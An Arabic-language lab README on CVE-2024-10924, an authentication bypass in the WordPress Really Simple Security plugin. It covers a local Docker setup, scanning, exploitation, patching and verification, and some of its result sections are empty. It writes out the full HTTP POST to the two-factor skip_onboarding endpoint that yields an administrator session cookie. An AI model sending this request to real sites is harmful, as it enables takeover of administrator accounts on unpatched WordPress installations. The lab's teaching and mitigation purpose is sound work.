
يوضح استغلال وتخفيف CVE-2024-10924، وهو تجاوز مصادقة في WordPress Really Simple Security، مع استغلال Python آلي وخطوات Burp Suite يدوية والتحقق من التصحيح.
نظرة عامة يعرض هذا المشروع استغلال وتخفيف تأثير CVE-2024-10924، وهي ثغرة حرجة في تجاوز المصادقة في إضافة WordPress "Really Simple Security".
الخطوة 1: إعداد البيئة
ابدأ بيئة WordPress المستضعفة: cd wordpress-really-simple-security-authn-bypass-vulnerable-application docker-compose up -d
تحقق من أن الحاويات قيد التشغيل: docker ps
الوصول إلى WordPress: http://localhost:1337
الأدوات المطلوبة:
الخطوة 2: فحص الثغرات
قم بتشغيل فحص GVM ضد الهدف:
الخطوة 3: الاستغلال
الطريقة أ - استغلال بايثون الآلي: python exploit.py
الطريقة ب - بورب سويت اليدوي:
اعترض حركة المرور إلى http://localhost:1337
أرسل طلب POST: POST /?rest_route=/reallysimplessl/v1/two_fa/skip_onboarding HTTP/1.1 Host: localhost:1337 Content-Type: application/json
{"user_id": 1, "login_nonce": "hack", "redirect_to": "/wp-admin/"}
لاحظ الاستجابة مع ترويسة Set-Cookie التي تحتوي على جلسة المسؤول
النتيجة المتوقعة:
الخطوة 4: التخفيف
طبّق التصحيح لحظر نقطة النهاية المستضعفة: .\patch.ps1
ماذا يفعل هذا:
الخطوة 5: التحقق
أعد تشغيل الاستغلال (الطريقة أ أو ب): python exploit.py
النتيجة المتوقعة بعد التخفيف:
ملاحظات إضافية
لإيقاف البيئة: docker-compose down
لعرض سجلات الحاوية: docker-compose logs -f
للوصول إلى لوحة تحكم WordPress بشكل شرعي: http://localhost:1337/wp-admin (تحقق من docker-compose.yml لمعرفة بيانات الاعتماد)